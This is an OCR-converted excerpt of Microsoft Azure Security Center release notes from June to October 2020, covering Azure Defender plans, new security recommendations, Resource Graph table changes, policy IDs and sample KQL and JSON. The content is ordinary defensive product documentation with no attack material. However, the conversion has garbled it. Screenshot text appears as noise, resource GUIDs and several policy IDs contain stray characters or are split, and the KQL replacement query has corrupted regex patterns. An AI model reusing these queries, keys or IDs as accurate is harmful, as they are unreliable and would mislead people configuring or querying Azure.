e Regulatory compliance dashboard now includes option to remove standards 


e Microsoft.Security/securityStatuses table removed from Azure Resource Graph (ARG) 


Vulnerability assessment for on-premises and multicloud machines 
(preview) 


Azure Defender for Servers’ integrated vulnerability assessment scanner (powered by Qualys) now 
scans Azure Arc-enabled servers. 


When you've enabled Azure Arc on your non-Azure machines, Security Center will offer to deploy the 
integrated vulnerability scanner on them - manually and at-scale. 


With this update, you can unleash the power of Azure Defender for Servers to consolidate your 
vulnerability management program across all of your Azure and non-Azure assets. 


Main capabilities: 


e Monitoring the VA (vulnerability assessment) scanner provisioning state on Azure Arc machines 

e Provisioning the integrated VA agent to unprotected Windows and Linux Azure Arc machines 
(manually and at-scale) 

e Receiving and analyzing detected vulnerabilities from deployed agents (manually and at-scale) 

e Unified experience for Azure VMs and Azure Arc machines 


Learn more about deploying the integrated Qualys vulnerability scanner to your hybrid machines. 


Learn more about Azure Arc-enabled servers. 


Azure Firewall recommendation added (preview) 
A new recommendation has been added to protect all your virtual networks with Azure Firewall. 


The recommendation, Virtual networks should be protected by Azure Firewall advises you to restrict 
access to your virtual networks and prevent potential threats by using Azure Firewall. 


Learn more about Azure Firewall Z. 


Authorized IP ranges should be defined on Kubernetes Services 
recommendation updated with quick fix 


The recommendation Authorized IP ranges should be defined on Kubernetes Services now has a 
quick fix option. 


For more information about this recommendation and all other Security Center recommendations, see 


Security recommendations - a reference guide. 


Authorized IP ranges should be defined on Kubernetes Services & x 


Severity Freshness interval 


| High ZO 30 Min 


^ Description 
Restrict access to the Kubernetes Service Management API by granting API access only to IP addresses in specific ranges. It is 
recommended to limit access to authorized IP ranges to ensure that only applications from allowed networks can access the cluster. 
“ Remediation steps 


Quick fix remediation: 
To remediate with a single click, in the Unhealthy resources tab (below), select the resources, and click "Remediate". 


Read the remediation details in the confirmation box, insert the relevant parameters if required and approve the remediation. 


Regulatory compliance dashboard now includes option to remove 
standards 


Security Center's regulatory compliance dashboard provides insights into your compliance posture 
based on how you're meeting specific compliance controls and requirements. 


The dashboard includes a default set of regulatory standards. If any of the supplied standards isn't 
relevant to your organization, it's now a simple process to remove them from the UI for a subscription. 
Standards can be removed only at the subscription level; not the management group scope. 


Learn more in Remove a standard from your dashboard. 


Microsoft.Security/securityStatuses table removed from Azure 
Resource Graph (ARG) 


Azure Resource Graph is a service in Azure that is designed to provide efficient resource exploration 
with the ability to query at scale across a given set of subscriptions so that you can effectively govern 


your environment. 


For Azure Security Center, you can use ARG and the Kusto Query Language (KQL) to query a wide 
range of security posture data. For example: 


e Asset inventory utilizes (ARG) 
e We have documented a sample ARG query for how to Identify accounts without multi-factor 
authentication (MFA) enabled 


Within ARG, there are tables of data for you to use in your queries. 


Azure Resource Graph Explorer x 
P Search « + New query E Open a query € ave z All subscriptions “ 
> B advisorresources Query 1 

> E alertsmanagementresources d 


> EB guestconfigurationresources 
> EB maintenanceresources 
> EB resourcecontainers 
> EB resources 
v B securityresources 
= microsoft.security/assessments 
= microsoft.security/assessments/subassessments 
> = microsoft.security/locations/alerts (Security Alerts (Preview)) 


— x Get started Results Messages 
> =microsoft.security/pricings 


> = microsoft.security/regulatorycompliancestandards ~ 
Filter... | BK About Resource Graph Language reference EZ Keyboard shortcuts 
= microsoft.security/regulatorycompliancestandards — — 
— /regulatorycompliancecontrols 


a ba 
= Mmicrosoft.security/regulatorycompliancestandards Most recent 


= /regulatorycompliancecontrols/regulatorycomplianceassessments e 
g Yy p 9 da E wv Example queries 


> Æ microsoft.security/securescores 


= NA 
> = microsoft.security/securescores/securescorecontrols Advanced queries 


> EB servicehealthresources 


Q Tip 


The ARG documentation lists all the available tables in Azure Resource Graph table and resource 
type reference. 


From this update, the Microsoft.Security/securityStatuses table has been removed. The 


securityStatuses API is still available. 
Data replacement can be used by Microsoft.Security/Assessments table. 


The major difference between Microsoft.Security/securityStatuses and Microsoft.Security/Assessments 
is that while the first shows aggregation of assessments, the seconds holds a single record for each. 


For example, Microsoft.Security/securityStatuses would return a result with an array of two 


policyAssessments: 


{ 
id: "/subscriptions/449bcidd-3470-4804-ab56-2752595 felab/resourceGroups/mico- 


rg/providers/Microsoft.Network/virtualNetworks/mico-rg- 
vnet/providers/Microsoft.Security/securityStatuses/mico-rg-vnet", 
name: "mico-rg-vnet", 
type: "Microsoft.Security/securityStatuses", 
properties: { 
policyAssessments: [ 
{assessmentKey: "e3deicce-f4dd-3b34-e496-8b5381bazd7e", category: "Networking", 
policyName: "Azure DDOS Protection should be enabled",...}, 
{assessmentKey: "sefac66a-1ec5-b@63-a824-eb28671dc527", category: "Compute", 
policyName: "",...} 
L 
securitystateByCategory: [{category: "Networking", securityState: "None" }, 
{category: "Compute",...], 
name: "GenericResourceHealthProperties", 
type: "VirtualNetwork", 
securitystate: "High" 


Whereas, Microsoft.Security/Assessments will hold a record for each such policy assessment as follows: 


{ 


type: "Microsoft.Security/assessments", 
id: "/subscriptions/449bc1dd-3470-4804-ab56-2752595f@1ab/resourceGroups/mico- 
rg/providers/Microsoft. Network/virtualNetworks/mico-rg- 
vnet/providers/Microsoft.Security/assessments/e3delcce-f4dd-3b34-e496 -8b5381ba2d70", 
name: "e3deicce-f4dd-3b34-e496-8b5381ba2d70", 
properties: { 

resourceDetails: {Source: "Azure", Id: "/subscriptions/449bc1dd- 3470-4804 -ab56- 
2752595f@1ab/resourceGroups/mico-rg/providers/Microsoft .Network/virtualNetworks/mico-rg- 
WME” No 

displayName: "Azure DDOS Protection should be enabled", 

status: (code: "NotApplicable", cause: "VnetHasNOAppGateways", description: "There 
are no Application Gateway resources attached to this Virtual Network"...} 


} 
{ 


type: "Microsoft.Security/assessments", 


id: "/subscriptions/449bc1dd-3470-4804-ab56-2752595f@1ab/resourcegroups/mico- 
rg/providers/microsoft.network/virtualnetworks/mico-rg- 


vnet/providers/Microsoft.Security/assessments/80fac66a-1ec5 -be63-a824-eb28671dc527", 
name: "8efac66a-1ec5-be63-a824-eb28671dc527", 
properties: { 


resourceDetails: (Source: "Azure", Id: "/subscriptions/449bc1dd- 3470-4804 -ab56- 


2752595f@1ab/resourcegroups/mico-rg/providers/microsoft.network/virtualnetworks/mico-rg- 
WMGNE 556 ))s 


displayName: "Audit diagnostic setting", 
status: {code: "Unhealthy"} 


Example of converting an existing ARG query using securityStatuses to now use the assessments 
table: 


Query that references SecurityStatuses: 
Kusto 


SecurityResources 


| where type == 'microsoft.security/securitystatuses' and properties.type == 
"virtualMachine' 


| where name in ({vmnames}) 


| project name, resourceGroup, policyAssesments = properties.policyAssessments, 
resourceRegion = location, id, resourceDetails = properties.resourceDetails 


Replacement query for the Assessments table: 
Kusto 


securityresources 
| where type == "microsoft.security/assessments" and id contains “virtualMachine" 


| extend resourceName = extract(@"(?i)/([*4/]*)/providers/Microsoft.Security/assessments", 
1, id) 


| extend source = tostring(properties.resourceDetails.Source) 


| extend resourceId = trim(" ", tolower(tostring(case(source =~ "azure", 
properties.resourceDetails.Id, 


source =~ "aws", properties.additionalData.AzureResourceld, 

source =~ "gcp", properties.additionalData.AzureResourceld, 
extract("*(.+)/providers/Microsoft.Security/assessments/.+$",1,id))))) 
| extend resourceGroup = tolower(tostring(split(resourceId, "/")[4])) 
| where resourceName in ({vmnames}) 


| project resourceName, resourceGroup, resourceRegion = location, id, resourceDetails = 
properties.additionalData 


Learn more at the following links: 


e How to create queries with Azure Resource Graph Explorer 
e Kusto Query Language (KQL) 


September 2020 


Updates in September include: 


e Security Center gets a new look! 


e Azure Defender released 

e Azure Defender for Key Vault is generally available 

e Azure Defender for Storage protection for Files and ADLS Gen2 is generally available 

e Asset inventory tools are now generally available 

e Disable a specific vulnerability finding for scans of container registries and virtual machines 

e Exempt a resource from a recommendation 

e AWS and GCP connectors in Security Center bring a multicloud experience 

e Kubernetes workload protection recommendation bundle 

e Vulnerability assessment findings are now available in continuous export 

e Prevent security misconfigurations by enforcing recommendations when creating new resources 

e Network security group recommendations improved 

e Deprecated preview AKS recommendation "Pod Security Policies should be defined on 
Kubernetes Services" 

e Email notifications from Azure Security Center improved 

e Secure score doesn't include preview recommendations 


e Recommendations now include a severity indicator and the freshness interval 


Security Center gets a new look 


We've released a refreshed UI for Security Center's portal pages. The new pages include a new 
overview page and dashboards for secure score, asset inventory, and Azure Defender. 


The redesigned overview page now has a tile for accessing the secure score, asset inventory, and Azure 
Defender dashboards. It also has a tile linking to the regulatory compliance dashboard. 


Learn more about the overview page. 


Azure Defender released 


Azure Defender is the cloud workload protection platform (CWPP) integrated within Security Center 
for advanced, intelligent, protection of your Azure and hybrid workloads. It replaces Security Center's 
standard pricing tier option. 


When you enable Azure Defender from the Pricing and settings area of Azure Security Center, the 
following Defender plans are all enabled simultaneously and provide comprehensive defenses for the 
compute, data, and service layers of your environment: 


e Azure Defender for Servers 

e Azure Defender for App Service 

e Azure Defender for Storage 

e Azure Defender for SQL 

e Azure Defender for Key Vault 

e Azure Defender for Kubernetes 

e Azure Defender for container registries 


Each of these plans is explained separately in the Security Center documentation. 


With its dedicated dashboard, Azure Defender provides security alerts and advanced threat protection 


for virtual machines, SQL databases, containers, web applications, your network, and more. 


Learn more about Azure Defender 


Azure Defender for Key Vault is generally available 


Azure Key Vault is a cloud service that safeguards encryption keys and secrets like certificates, 
connection strings, and passwords. 


Azure Defender for Key Vault provides Azure-native, advanced threat protection for Azure Key Vault, 
providing an additional layer of security intelligence. By extension, Azure Defender for Key Vault is 
consequently protecting many of the resources dependent upon your Key Vault accounts. 


The optional plan is now GA. This feature was in preview as "advanced threat protection for Azure Key 
Vault". 


Also, the Key Vault pages in the Azure portal now include a dedicated Security page for Security 
Center recommendations and alerts. 


Learn more in Azure Defender for Key Vault. 


Azure Defender for Storage protection for Files and ADLS Genz is 
generally available 


Azure Defender for Storage detects potentially harmful activity on your Azure Storage accounts. Your 
data can be protected whether it's stored as blob containers, file shares, or data lakes. 


Support for Azure Files and Azure Data Lake Storage Gen2 is now generally available. 
From 1 October 2020, we'll begin charging for protecting resources on these services. 


Learn more in Azure Defender for Storage. 


Asset inventory tools are now generally available 


The asset inventory page of Azure Security Center provides a single page for viewing the security 
posture of the resources you've connected to Security Center. 


Security Center periodically analyzes the security state of your Azure resources to identify potential 
security vulnerabilities. It then provides you with recommendations on how to remediate those 


vulnerabilities. 
When any resource has outstanding recommendations, they'll appear in the inventory. 


Learn more in Explore and manage your resources with asset inventory. 


Disable a specific vulnerability finding for scans of container 
registries and virtual machines 


Azure Defender includes vulnerability scanners to scan images in your Azure Container Registry and 


your virtual machines. 


If you have an organizational need to ignore a finding, rather than remediate it, you can optionally 
disable it. Disabled findings don't impact your secure score or generate unwanted noise. 


When a finding matches the criteria you've defined in your disable rules, it won't appear in the list of 
findings. 


This option is available from the recommendations details pages for: 


e Vulnerabilities in Azure Container Registry images should be remediated 


e Vulnerabilities in your virtual machines should be remediated 


Learn more in Disable specific findings for your container images and Disable specific findings for your 


virtual machines. 


Exempt a resource from a recommendation 


Occasionally, a resource will be listed as unhealthy regarding a specific recommendation (and therefore 
lowering your secure score) even though you feel it shouldn't be. It might have been remediated by a 
process not tracked by Security Center. Or perhaps your organization has decided to accept the risk for 
that specific resource. 


In such cases, you can create an exemption rule and ensure that resource isn't listed amongst the 
unhealthy resources in the future. These rules can include documented justifications as described 
below. 


Learn more in Exempt a resource from recommendations and secure score. 


AWS and GCP connectors in Security Center bring a multicloud 
experience 


With cloud workloads commonly spanning multiple cloud platforms, cloud security services must do 
the same. 


Azure Security Center now protects workloads in Azure, Amazon Web Services (AWS), and Google 
Cloud Platform (GCP). 


Onboarding your AWS and GCP projects into Security Center, integrates AWS Security Hub, GCP 
Security Command and Azure Security Center. 


Learn more in Connect your AWS accounts to Azure Security Center and Connect your GCP projects to 
Azure Security Center. 
Kubernetes workload protection recommendation bundle 


To ensure that Kubernetes workloads are secure by default, Security Center is adding Kubernetes level 


hardening recommendations, including enforcement options with Kubernetes admission control. 


When you've installed Azure Policy for Kubernetes on your AKS cluster, every request to the 
Kubernetes API server will be monitored against the predefined set of best practices before being 
persisted to the cluster. You can then configure to enforce the best practices and mandate them for 


future workloads. 


For example, you can mandate that privileged containers shouldn't be created, and any future requests 


to do so will be blocked. 


Learn more in Workload protection best-practices using Kubernetes admission control. 


Vulnerability assessment findings are now available in continuous 
export 


Use continuous export to stream your alerts and recommendations to Azure Event Hubs, Log Analytics 
workspaces, or Azure Monitor. From there, you can integrate this data with SIEMs (such as Azure 
Sentinel, Power BI, Azure Data Explorer, and more. 


Security Center's integrated vulnerability assessment tools return findings about your resources as 
actionable recommendations within a ‘parent’ recommendation such as "Vulnerabilities in your virtual 


machines should be remediated". 


The security findings are now available for export through continuous export when you select 
recommendations and enable the include security findings option. 


Settings | Continuous export 


Contoso 
A Search (Ctri+/) | « 


Settings 


) Pricing tier = Continuous export 


© Data Collection 
Configure streaming export setting of Security alerts and recommendations to multiple export targets. 

@ Email notifications Exporting Microsoft Defender for Cloud's data also enables you to use experiences such as integration with 3rd-party SIEM and Azure Data Explorer. 
Learn More > 

© Threat detection 


Xó Workflow automation Event hub Log Analytics workspace 


Export enabled ( o am 


@ Continuous export 


Exported data types 


E Security recommendations | All recommendations sele... V 


Recommendation severity | No selected severities Vv 


Include security findings © k.i 


Related pages: 


e Security Center's integrated Qualys vulnerability assessment solution for Azure virtual machines 
e Security Center's integrated vulnerability assessment solution for Azure Container Registry images 
e Continuous export 


Prevent security misconfigurations by enforcing recommendations 
when creating new resources 


Security misconfigurations are a major cause of security incidents. Security Center now has the ability 
to help prevent misconfigurations of new resources with regard to specific recommendations. 


This feature can help keep your workloads secure and stabilize your secure score. 
Enforcing a secure configuration, based on a specific recommendation, is offered in two modes: 
e Using the Deny effect of Azure Policy, you can stop unhealthy resources from being created 


e Using the Enforce option, you can take advantage of Azure Policy's DeploylfNotExist effect and 


automatically remediate non-compliant resources upon creation 


This is available for selected security recommendations and can be found at the top of the resource 
details page. 


Learn more in Prevent misconfigurations with Enforce/Deny recommendations. 


Network security group recommendations improved 


The following security recommendations related to network security groups have been improved to 
reduce some instances of false positives. 


e All network ports should be restricted on NSG associated to your VM 

e Management ports should be closed on your virtual machines 

e Internet-facing virtual machines should be protected with Network Security Groups 
e Subnets should be associated with a Network Security Group 


Deprecated preview AKS recommendation "Pod Security Policies 
should be defined on Kubernetes Services" 


The preview recommendation "Pod Security Policies should be defined on Kubernetes Services" is 
being deprecated as described in the Azure Kubernetes Service documentation. 


The pod security policy (preview) feature, is set for deprecation and will no longer be available after 
October 15, 2020 in favor of Azure Policy for AKS. 


After pod security policy (preview) is deprecated, you must disable the feature on any existing clusters 
using the deprecated feature to perform future cluster upgrades and stay within Azure support. 


Email notifications from Azure Security Center improved 
The following areas of the emails regarding security alerts have been improved: 


e Added the ability to send email notifications about alerts for all severity levels 

e Added the ability to notify users with different Azure roles on the subscription 

e We're proactively notifying subscription owners by default on high-severity alerts (which have a 
high-probability of being genuine breaches) 

e We've removed the phone number field from the email notifications configuration page 


Learn more in Set up email notifications for security alerts. 


Secure score doesn't include preview recommendations 


Security Center continually assesses your resources, subscriptions, and organization for security issues. 
It then aggregates all the findings into a single score so that you can tell, at a glance, your current 


security situation: the higher the score, the lower the identified risk level. 


As new threats are discovered, new security advice is made available in Security Center through new 
recommendations. To avoid surprise changes your secure score, and to provide a grace period in which 
you can explore new recommendations before they impact your scores, recommendations flagged as 
Preview are no longer included in the calculations of your secure score. They should still be 
remediated wherever possible, so that when the preview period ends they'll contribute towards your 


score. 
Also, Preview recommendations don't render a resource "Unhealthy". 


An example of a preview recommendation: 


V Remediate vulnerabilities 6 2.00 08 +7% Unassigned 91 of 169 resources —= 
Azure Kubernetes Service clusters should have the Azure Policy add-on for Kubernetes installed © Completed & 0 of 67 Kubernetes servi. rr 
Azure Arc-enabled Kubernetes clusters should have the Azure Policy extension installed © Completed Š 0 of 36 Kubernetes - Az... Pr 
Machines should have a vulnerability assessment solution Unassigned EA 45 of 49 virtual machines — 
Machines should have vulnerability findings resolved © Completed EA 0 of 49 virtual machines 
Container registry images should have vulnerability findings resolved Unassigned @ 8 of 16 container registri... mammusa: 


Container images should be deployed from trusted registries only Unassigned 38 of 60 resources Œ 


Kubernetes clusters should gate deployment of vulnerable images Unassigned GA of 48 Kubernetes servi... Pr 


Running container images should have vulnerability findings resolved Unassigned ZG 3 of 54 Kubernetes servi... mm 


Learn more about secure score. 


Recommendations now include a severity indicator and the 
freshness interval 


The details page for recommendations now includes a freshness interval indicator (whenever relevant) 
and a clear display of the severity of the recommendation. 


Disk encryption should be applied on virtual machines 


Severity Freshness interval 


| High ® 24 Hours 


v Description 
Y Remediation steps 


v Affected resources 


August 2020 


Updates in August include: 


e Asset inventory - powerful new view of the security posture of your assets 

e Added support for Azure Active Directory security defaults (for multi-factor authentication) 

e Service principals recommendation added 

e Vulnerability assessment on VMs - recommendations and policies consolidated 

e New AKS security policies added to ASC_default initiative — for use by private preview customers 
only 


Asset inventory - powerful new view of the security posture of your 
assets 


Security Center's asset inventory (currently in preview) provides a way to view the security posture of 
the resources you've connected to Security Center. 


Security Center periodically analyzes the security state of your Azure resources to identify potential 
security vulnerabilities. It then provides you with recommendations on how to remediate those 
vulnerabilities. When any resource has outstanding recommendations, they'll appear in the inventory. 


You can use the view and its filters to explore your security posture data and take further actions based 
on your findings. 


Learn more about asset inventory. 


Added support for Azure Active Directory security defaults (for 
multi-factor authentication) 


Security Center has added full support for security defaults, Microsoft's free identity security 
protections. 


Security defaults provide preconfigured identity security settings to defend your organization from 
common identity-related attacks. Security defaults already protecting more than 5 million tenants 
overall; 50,000 tenants are also protected by Security Center. 


Security Center now provides a security recommendation whenever it identifies an Azure subscription 
without security defaults enabled. Until now, Security Center recommended enabling multi-factor 
authentication using conditional access, which is part of the Azure Active Directory (AD) premium 
license. For customers using Azure AD free, we now recommend enabling security defaults. 


Our goal is to encourage more customers to secure their cloud environments with MFA, and mitigate 
one of the highest risks that is also the most impactful to your secure score. 


Learn more about security defaults. 


Service principals recommendation added 


A new recommendation has been added to recommend that Security Center customers using 
management certificates to manage their subscriptions switch to service principals. 


The recommendation, Service principals should be used to protect your subscriptions instead of 
Management Certificates advises you to use Service Principals or Azure Resource Manager to more 
securely manage your subscriptions. 


Learn more about Application and service principal objects in Azure Active Directory. 


Vulnerability assessment on VMs - recommendations and policies 
consolidated 


Security Center inspects your VMs to detect whether they're running a vulnerability assessment 
solution. If no vulnerability assessment solution is found, Security Center provides a recommendation 
to simplify the deployment. 


When vulnerabilities are found, Security Center provides a recommendation summarizing the findings 
for you to investigate and remediate as necessary. 


To ensure a consistent experience for all users, regardless of the scanner type they're using, we've 


unified four recommendations into the following two: 


Unified recommendation Change description 

A vulnerability assessment solution Replaces the following two recommendations: 

should be enabled on your virtual Tr Enable the built-in vulnerability assessment solution on virtual 
machines machines (powered by Qualys (now deprecated) (Included with 


standard tier) 
TIRE Vulnerability assessment solution should be installed on your 
virtual machines (now deprecated) (Standard and free tiers) 


Vulnerabilities in your virtual machines Replaces the following two recommendations: 

should be remediated ***** Ramediate vulnerabilities found on your virtual machines 
(powered by Qualys) (now deprecated) 
TIE Vulnerabilities should be remediated by a Vulnerability 
Assessment solution (now deprecated) 


Now you'll use the same recommendation to deploy Security Center's vulnerability assessment 
extension or a privately licensed solution ("BYOL") from a partner such as Qualys or Rapid7. 


Also, when vulnerabilities are found and reported to Security Center, a single recommendation will 
alert you to the findings regardless of the vulnerability assessment solution that identified them. 


Updating dependencies 


If you have scripts, queries, or automations referring to the previous recommendations or policy 


keys/names, use the tables below to update the references: 


Before August 2020 


Recommendation Scope 


Enable the built-in vulnerability assessment solution on virtual machines (powered by Qualys) Built-in 
Key: 550e890b-e652-4d22-8274-60b3bdb24c63 


Recommendation Scope 


Remediate vulnerabilities found on your virtual machines (powered by Qualys) Built-in 
Key: 1195afff-c881-495e-9bc5-148621 1ae03f 


Vulnerability assessment solution should be installed on your virtual machines BYOL 
Key: 01b1ed4c-b733-4fee-b145-f23236e70cf3 


Vulnerabilities should be remediated by a Vulnerability Assessment solution BYOL 
Key: 71992a2a-d168-42e0-b10e-6b45fa2ecddb 
Policy Scope 


Vulnerability assessment should be enabled on virtual machines Built-in 
Policy ID: 501541f7-f7e7-4cd6-868c-41 90fdad3ac9 


Vulnerabilities should be remediated by a vulnerability assessment solution BYOL 
Policy ID: 760a85ff-6162-42b3-8d70-698e268f648c 


From August 2020 


Recommendation Scope 


A vulnerability assessment solution should be enabled on your virtual machines Built-in + BYOL 
Key: ffff0522-1e88-47fc-8382-2a80ba848f5d 


Vulnerabilities in your virtual machines should be remediated Built-in + BYOL 
Key: 1195afff-c881-495e-9bc5-148621 1ae03f 


Policy Scope 


Vulnerability assessment should be enabled on virtual machines “ Built-in + BYOL 
Policy ID: 501541f7-f7e7-4cd6-868c-4190fdad3ac9 


New AKS security policies added to ASC_default initiative — for use 
by private preview customers only 


To ensure that Kubernetes workloads are secure by default, Security Center is adding Kubernetes level 
policies and hardening recommendations, including enforcement options with Kubernetes admission 


control. 


The early phase of this project includes a private preview and the addition of new (disabled by default) 
policies to the ASC_default initiative. 


You can safely ignore these policies and there will be no impact on your environment. If you'd like to 
enable them, sign up for the preview via the Microsoft Cloud Security Private Community E and select 


from the following options: 


1. Single Preview — To join only this private preview. Explicitly mention "ASC Continuous Scan" as 
the preview you would like to join. 


2. Ongoing Program - To be added to this and future private previews. You'll need to complete a 
profile and privacy agreement. 


July 2020 


Updates in July include: 


e Vulnerability assessment for virtual machines is now available for non-marketplace images 

e Threat protection for Azure Storage expanded to include Azure Files and Azure Data Lake Storage 
Gen2 (preview) 

e Eight new recommendations to enable threat protection features 

e Container security improvements - faster registry scanning and refreshed documentation 

e Adaptive application controls updated with a new recommendation and support for wildcards in 
path rules 

e Six policies for SQL advanced data security deprecated 


Vulnerability assessment for virtual machines is now available for 
non-marketplace images 


When deploying a vulnerability assessment solution, Security Center previously performed a validation 
check before deploying. The check was to confirm a marketplace SKU of the destination virtual 


machine. 


From this update, the check has been removed and you can now deploy vulnerability assessment tools 
to ‘custom’ Windows and Linux machines. Custom images are ones that you've modified from the 
marketplace defaults. 


Although you can now deploy the integrated vulnerability assessment extension (powered by Qualys) 
on many more machines, support is only available if you're using an OS listed in Deploy the integrated 
vulnerability scanner to standard tier VMs 


Learn more about the integrated vulnerability scanner for virtual machines (requires Azure Defender). 
Learn more about using your own privately-licensed vulnerability assessment solution from Qualys or 


Rapid7 in Deploying a partner vulnerability scanning solution. 


Threat protection for Azure Storage expanded to include Azure 
Files and Azure Data Lake Storage Gen2 (preview) 


Threat protection for Azure Storage detects potentially harmful activity on your Azure Storage 
accounts. Security Center displays alerts when it detects attempts to access or exploit your storage 


accounts. 


Your data can be protected whether it's stored as blob containers, file shares, or data lakes. 


Eight new recommendations to enable threat protection features 


Eight new recommendations have been added to provide a simple way to enable Azure Security 
Center's threat protection features for the following resource types: virtual machines, App Service 
plans, Azure SQL Database servers, SQL servers on machines, Azure Storage accounts, Azure 
Kubernetes Service clusters, Azure Container Registry registries, and Azure Key Vault vaults. 


The new recommendations are: 


e Advanced data security should be enabled on Azure SQL Database servers 

e Advanced data security should be enabled on SQL servers on machines 

e Advanced threat protection should be enabled on Azure App Service plans 

e Advanced threat protection should be enabled on Azure Container Registry registries 
e Advanced threat protection should be enabled on Azure Key Vault vaults 

e Advanced threat protection should be enabled on Azure Kubernetes Service clusters 
e Advanced threat protection should be enabled on Azure Storage accounts 

e Advanced threat protection should be enabled on virtual machines 


These new recommendations belong to the Enable Azure Defender security control. 


The recommendations also include the quick fix capability. 


© Important 


Remediating any of these recommendations will result in charges for protecting the relevant 
resources. These charges will begin immediately if you have related resources in the current 
subscription. Or in the future, if you add them at a later date. 


For example, if you don't have any Azure Kubernetes Service clusters in your subscription and you 
enable the threat protection, no charges will be incurred. If, in the future, you add a cluster on the 
same subscription, it will automatically be protected and charges will begin at that time. 


Learn more about each of these in the security recommendations reference page. 


Learn more about threat protection in Azure Security Center. 


Container security improvements - faster registry scanning and 
refreshed documentation 

As part of the continuous investments in the container security domain, we are happy to share a 
significant performance improvement in Security Center's dynamic scans of container images stored in 


Azure Container Registry. Scans now typically complete in approximately two minutes. In some cases, 


they might take up to 15 minutes. 


To improve the clarity and guidance regarding Azure Security Center's container security capabilities, 


we've also refreshed the container security documentation pages. 
Learn more about Security Center's container security in the following articles: 


e Overview of Security Center's container security features 
e Details of the integration with Azure Container Registry 


e Details of the integration with Azure Kubernetes Service 
e How-to scan your registries and harden your Docker hosts 
e Security alerts from the threat protection features for Azure Kubernetes Service clusters 


e Security recommendations for containers 


Adaptive application controls updated with a new 
recommendation and support for wildcards in path rules 


The adaptive application controls feature has received two significant updates: 


e Anew recommendation identifies potentially legitimate behavior that hasn't previously been 
allowed. The new recommendation, Allowlist rules in your adaptive application control policy 
should be updated, prompts you to add new rules to the existing policy to reduce the number of 
false positives in adaptive application controls violation alerts. 


e Path rules now support wildcards. From this update, you can configure allowed path rules using 
wildcards. There are two supported scenarios: 


o Using a wildcard at the end of a path to allow all executables within this folder and sub-folders 


o Using a wildcard in the middle of a path to enable a known executable name with a changing 
folder name (e.g. personal user folders with a known executable, automatically generated 
folder names, etc.). 


Learn more about adaptive application controls. 


Six policies for SQL advanced data security deprecated 
Six policies related to advanced data security for SQL machines are being deprecated: 


e Advanced threat protection types should be set to ‘All’ in SQL managed instance advanced data 
security settings 

e Advanced threat protection types should be set to AI in SQL server advanced data security 
settings 

e Advanced data security settings for SQL managed instance should contain an email address to 
receive security alerts 

e Advanced data security settings for SQL server should contain an email address to receive 
security alerts 

e Email notifications to admins and subscription owners should be enabled in SQL managed 
instance advanced data security settings 

e Email notifications to admins and subscription owners should be enabled in SQL server advanced 
data security settings 


Learn more about built-in policies. 


June 2020 


Updates in June include: 


e Secure score API (preview) 

e Advanced data security for SQL machines (Azure, other clouds, and on-premises) (preview) 

e Two new recommendations to deploy the Log Analytics agent to Azure Arc machines (preview) 
e New policies to create continuous export and workflow automation configurations at scale 

e New recommendation for using NSGs to protect non-internet-facing virtual machines 

e New policies for enabling threat protection and advanced data security 


Secure score API (preview) 


You can now access your score via the secure score API (currently in preview). The API methods provide 
the flexibility to query the data and build your own reporting mechanism of your secure scores over 
time. For example, you can use the Secure Scores API to get the score for a specific subscription. In 
addition, you can use the Secure Score Controls API to list the security controls and the current score 
of your subscriptions. 


For examples of external tools made possible with the secure score API, see the secure score area of 
our GitHub community“. 


Learn more about secure score and security controls in Azure Security Center. 


Advanced data security for SQL machines (Azure, other clouds, and 
on-premises) (preview) 


Azure Security Center's advanced data security for SQL machines now protects SQL Servers hosted in 
Azure, on other cloud environments, and even on-premises machines. This extends the protections for 
your Azure-native SQL Servers to fully support hybrid environments. 


Advanced data security provides vulnerability assessment and advanced threat protection for your SQL 
machines wherever they're located. 


Set up involves two steps: 


1. Deploying the Log Analytics agent to your SQL Server's host machine to provide the connection 
to Azure account. 


2. Enabling the optional bundle in Security Center's pricing and settings page. 


Learn more about advanced data security for SQL machines. 


Two new recommendations to deploy the Log Analytics agent to 
Azure Arc machines (preview) 


Two new recommendations have been added to help deploy the Log Analytics Agent to your Azure Arc 
machines and ensure they're protected by Azure Security Center: 


e Log Analytics agent should be installed on your Windows-based Azure Arc machines (Preview) 
e Log Analytics agent should be installed on your Linux-based Azure Arc machines (Preview) 


These new recommendations will appear in the same four security controls as the existing (related) 
recommendation, Monitoring agent should be installed on your machines: remediate security 
configurations, apply adaptive application control, apply system updates, and enable endpoint 


protection. 

The recommendations also include the Quick fix capability to help speed up the deployment process. 
Learn more about these two new recommendations in the Compute and app recommendations table. 
Learn more about how Azure Security Center uses the agent in What is the Log Analytics agent?. 


Learn more about extensions for Azure Arc machines. 


New policies to create continuous export and workflow 
automation configurations at scale 


Automating your organization's monitoring and incident response processes can greatly improve the 
time it takes to investigate and mitigate security incidents. 


To deploy your automation configurations across your organization, use these built-in 
‘DeploylfdNotExist' Azure policies to create and configure continuous export and workflow automation 


procedures: 


The policy definitions can be found in Azure Policy: 


Goal Policy Policy ID 

Continuous export to Event Deploy export to Event Hubs for Azure Security cdfcce10-4578-4ecd- 
Hubs Center alerts and recommendations € 9703-530938e4abcb 
Continuous export to Log Deploy export to Log Analytics workspace for Azure _ ffb6f416-7bd2-4488- 
Analytics workspace Security Center alerts and recommendations E 8828-56585 fef2be9 
Workflow automation for Deploy Workflow Automation for Azure Security £1525828-9a90-4fcf- 
security alerts Center alerts 7 be48-268cdd02361e 
Workflow automation for Deploy Workflow Automation for Azure Security 73d6ab6c-2475-4850- 
security recommendations Center recommendations 7 afd6-43795f3492ef 


Get started with workflow automation templates £ . 


Learn more about using the two export policies in Configure workflow automation at scale using the 
supplied policies and Set up a continuous export. 


New recommendation for using NSGs to protect non-internet- 
facing virtual machines 


The "implement security best practices" security control now includes the following new 


recommendation: 


e Non-internet-facing virtual machines should be protected with network security groups 


An existing recommendation, Internet-facing virtual machines should be protected with network 
security groups, didn't distinguish between internet-facing and non-internet facing VMs. For both, a 
high-severity recommendation was generated if a VM wasn't assigned to a network security group. 
This new recommendation separates the non-internet-facing machines to reduce the false positives 
and avoid unnecessary high-severity alerts. 


Learn more in the Network recommendations table. 


New policies for enabling threat protection and advanced data 
security 


The new policy definitions below were added to the ASC Default initiative and are designed to assist 
with enabling threat protection or advanced data security for the relevant resource types. 


The policy definitions can be found in Azure Policy: 


Policy Policy ID 


Advanced data security should be enabled on Azure SQL Database servers S 7fe3b40f-802b-4cdd-8bd4- 
fd799c948cc2 


Advanced data security should be enabled on SQL servers on machines? 6581d072-105e-4418-827f- 
bd446d56421b 


Advanced threat protection should be enabled on Azure Storage accounts % 308fbb08-4ab8-4e67-9b29- 
592e93fb94fa 


